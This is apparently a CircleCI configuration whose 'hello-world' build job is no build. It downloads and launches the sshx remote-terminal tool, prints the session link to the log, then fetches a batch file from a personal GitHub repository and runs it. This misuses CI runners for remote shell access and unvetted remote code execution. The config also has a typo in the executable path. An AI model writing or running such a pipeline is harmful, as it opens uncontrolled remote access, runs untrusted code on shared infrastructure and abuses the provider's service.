version: 2.1

orbs:
  win: circleci/windows@4.1.1

workflows:
  hello-world:
    jobs:
      - build
  

jobs:
  build:
    executor:
      name: win/default
    working_directory: C:\Users\circleci\
    steps:
      - checkout:
          path: C:\Users\circleci\
      - run:
          name: "Yes"
          command: | 
            $archivePath = "C:\Users\circleci\setup.zip" 
            $destinationPath = "C:\Users\runneradmin\Documents"
            
            md C:\Users\runneradmin\Documents
            wget -O setup.zip https://sshx.s3.amazonaws.com/sshx-x86_64-pc-windows-msvc.zip
            
            Expand-Archive -Path $archivePath -DestinationPath $destinationPath -Force
            Start-Process -FilePath "C:\Users\runnderadmin\Documents\sshx.exe" -NoNewWindow -RedirectStandardOutput "sshx.log"

            cat sshx.log

            sleep 60

            wget -O start.bat https://github.com/Efebey2903/files/raw/refs/heads/main/loop.bat
            cmd /c start.bat  
